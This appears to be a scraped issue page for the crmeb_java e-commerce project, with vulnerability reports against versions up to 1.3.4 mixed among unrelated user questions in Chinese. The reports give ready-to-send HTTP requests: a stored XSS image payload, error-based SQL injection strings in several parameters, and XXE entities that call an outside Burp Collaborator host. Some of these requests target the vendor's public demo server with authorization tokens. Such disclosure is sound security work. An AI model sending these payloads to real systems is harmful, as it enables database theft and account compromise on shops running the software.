[Suggested description]
Store XSS vulnerability exists in crmeb_java <=1.3.4
Failure to filter or validate parameters effectively results in stored XSS.

[Vulnerability Type]
Stored XSS

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/admin/store/product/save

[Attack Type]
Remote

[Vulnerability details]
payload :

<img src=\"1111\" alt=\"2222\" width=\"33\" height=\"33\" onclick=\"alert`333`\" onerror=alert(2)/>

Get the request message of the /api/admin/store/product/save interface.

POST /api/admin/store/product/save HTTP/2
Host: api.java.crmeb.net
Content-Length: 1213
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","sliderImages":["https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg"],"videoLink":"","sliderImage":"[\"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg\"]","storeName":"3333","storeInfo":"2132131","keyword":"1111","cateIds":[972,1185],"cateId":"972,1185","unitName":"1111","sort":1,"giveIntegral":1,"ficti":2,"isShow":false,"isBenefit":false,"isNew":false,"isGood":false,"isHot":true,"isBest":false,"tempId":94,"attrValue":[{"image":"https://api.java.crmeb.net/crmebimage/public/maintain/2023/03/13/9f83773cd1bf47118d6e02ad86b599520ay7shmx9i.jpg","price":0,"cost":0,"otPrice":0,"stock":0,"barCode":"","weight":0,"volume":0,"attrValue":"{\"规格\":\"默认\"}"}],"attr":[{"attrName":"规格","attrValues":"默认","id":0}],"selectRule":"","isSub":false,"content":"111","specType":false,"id":0,"couponIds":[],"coupons":[],"activity":["默认","秒杀","砍价","拼团"]}

The content parameter has a stored XSS vulnerability.
Insert the payload and send the request packet.

Find the added product and enter the product details page, click the inserted img tag to trigger the vulnerability.

There you can see it!

[Impact Code execution]
true

[Cause of vulnerability]
com.zbkj.admin.controller.StoreProductController line 77.
The save() method of storeProductService is called on line 77 of this controller

Follow up this method to com.zbkj.service.service.impl.StoreProductServiceImpl.
On line 339, save the value of the content parameter in the request packet to the database.
Come to the front page.
In crmeb_java\admin\src\views\store\creatStore\index.vue, in line 296, use v-html to render the obtained content value. It is known that v-html will treat the obtained content as HTML code to render.

The reason for this vulnerability is that there is no legal security check on user data.

The end,thanks!

java.sql.SQLException: url not set
[com.alibaba.druid.pool.DruidDataSource:978] : {dataSource-1} init error

请问这个问题如何解？连不上数据库

试用了一下,功能ok就是bug有点多,另外建议拆分为几个项目维护,java可以分模块管理

[Suggested description]
There is a SQL Injection vulnerability in crmeb_java <=1.3.4, caused by the param sortKey which is in ${} format and isn't strictly filtered.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/front/store/list

[Attack Type]
Remote

[Vulnerability details]

[Impact Code execution]
true
[Cause of vulnerability]
The interface /api/front/store/list call the function getNearList

function getNearList will be called when inputing both latitude and longitude parameters.

The latitude and longitude parameters are used in ${} format and it will be joined to the sql string directly.

1.请问我可以直接将代码下载、部署安装给客户，不支付贵公司任何费用吗？
2.假如1成立，那么贵公司官网售卖的crmeb_java源码与本源码不同是吗？

[Suggested description]
sql injection vulnerability exists in crmeb_java <=1.3.4
Failure to check the parameters legally leads to sqli.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/admin/store/product/list

[Attack Type]
Remote

[Vulnerability details]
Get the interface request package
GET /api/admin/store/product/list?page=1&limit=20&cateId=&keywords=&type=1&temp=1678870222 HTTP/2
Host: api.java.crmeb.net
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/plain, /
Authori-Zation: 213ff6ff1ca24ae78f8263bd7ad0ea6c
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://admin.java.crmeb.net
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.java.crmeb.net/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

The cateId parameter has an injection vulnerability.

There you can see it!

[Impact Code execution]
true
[Cause of vulnerability]
com.zbkj.admin.controller.SystemMenuController line 49
The controller calls the getAdminList() method

follow up to com.zbkj.service.service.impl.StoreProductServiceImpl line 172,
Here, the cateId is directly spliced ​​into the SQL statement, thus causing a SQL injection vulnerability

The end,thanks!

和PHP版本的功能保持一致吗？看着好像没PHP版本的功能多

[Suggested description]
There is a SQL Injection vulnerability in crmeb_java <=1.3.4, caused by the param sortKey which is in ${} format and isn't strictly filtered.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/front/spread/people

[Attack Type]
Remote

[Vulnerability details]
Make sure the user has at least two promoters.

Send the crafted request package to the api interface /api/front/spread/people

GET /api/front/spread/people?sortKey=updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase()),0x7e),1) HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
content-type: application/json
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Origin: http://localhost:8082
Connection: close
Referer: http://localhost:8082/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

[Impact Code execution]
true
[Cause of vulnerability]
The interface /spread/people call the function getSpreadPeopleList

Make sure the user has secondary promoter, the it will call the function getSpreadPeopleList.

There is a trick that the order by statement is only executed if there are at least two promoters.
The param sortKey is ${} format and it will be joined to the sql string directly.

That's all, thanks.

[Suggested description]
There is a XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SaxReader component.

[Vulnerability Type]
XML External Entity (XXE) Injection

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/public/wechat/message/webHook

[Attack Type]
Remote

[Vulnerability details]
Send the crafted request package to the api interface /api/public/wechat/message/webHook

POST /api/public/wechat/message/webHook HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 180

<?xml version="1.0"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://8r0e5uqbuix3subuusrvl4ec43atyi.burpcollaborator.net/evil.xml" >]>
<foo>&xxe;</foo>

[Impact Code execution]
true

[Cause of vulnerability]
The interface /api/public/wechat/message/webHook calls the function init.

It calls the function xmlToMap.

There is a XXE Injection vulnerability with the SAXReader component.

That's all, thanks.

[Suggested description]
There is a XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SaxReader component.

[Vulnerability Type]
XML External Entity (XXE) Injection

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/admin/payment/callback/wechat

[Attack Type]
Remote

[Vulnerability details]
Send the crafted request package to the api interface /api/admin/payment/callback/wechat

POST /api/admin/payment/callback/wechat HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 239

<?xml version="1.0"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://3qurglf920zqknzhgryal9ip7gd61v.burpcollaborator.net/evil.xml" >]>
<return_code>&xxe;</return_code>
<return_msg><![CDATA[OK]]></return_msg>

[Impact Code execution]
true

[Cause of vulnerability]
The interface /api/admin/payment/callback/wechat calls the function weChat

If the xmlInfo is not blank, the function processResponseXml will be called.

Then it calls the function xmlToMap to process the xml.

There is a XXE Injection vulnerability with the SAXReader component.

That's all, thanks.

[Suggested description]
There is a SQL Injection vulnerability in crmeb_java <=1.3.4, caused by params province and city which are in ${} format and are not strictly filtered.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/front/spread/people

[Attack Type]
Remote

[Vulnerability details]
Send the crafted request package to the api interface /api/admin/user/list

GET /api/admin/user/list?labelId=&userType=&sex=&isPromoter=&country=foo&payCount=&accessType=0&dateLimit=&keywords=&province=&city=1'+and+updatexml(1,concat(0x7e,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema%3ddatabase()),0x7e),1)%23&page=1&limit=15&level=&groupId=&temp=1678934444 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: fa1df85d14f940a1ad4c9760ba8f8f20
Origin: http://localhost:9527
Connection: close
Referer: http://localhost:9527/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

[Impact Code execution]
true

[Cause of vulnerability]
The interface /list calls the function getList.

Trace the function com/zbkj/service/service/impl/UserServiceImpl.java#getList
If the param country is not null, the params province and city will be joined directly to the addres value.

The param addres is in ${} format and it will be joined directly to the sql string.

That's all, thanks.

There is an SQL injection vulnerability in the crmeb_java system (/api/admin/system/store/order/list) interface.

crmeb_java系统/api/admin/system/store/order/list接口存在sql注入的问题；

其中keywords参数存在sql注入的问题；
There is a SQL injection vulnerability with the keywords parameter.

com/zbkj/admin/controller/SystemWriteOffOrderController.java

keywords字符串拼接导致存在SQL注入；
There is an SQL injection vulnerability due to the string concatenation of the keywords.

com/zbkj/service/service/impl/StoreOrderServiceImpl.java

npm install直接失败已安装的依赖自动清除了

[Suggested description]
sql injection vulnerability exists in crmeb_java <=1.3.4
/api/admin/user/list endpoint Unfiltered parameters 'level' cause sqli

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]

GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2
Host: api.java.crmeb.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a
Origin: https://admin.java.crmeb.net
Referer: https://admin.java.crmeb.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

[Attack Type]
Remote

[Vulnerability details]
step 1 login admin click user Manager and click search button

step 2 intercept request use burpsuite

step 3 insert payload in paramter “level”

level=1+and+extractvalue(1,CONCAT(1,user()))

https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%

there you can see it

[Impact Code execution]
true
[Cause of vulnerability]
\crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml
line 36 "${level}"
When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli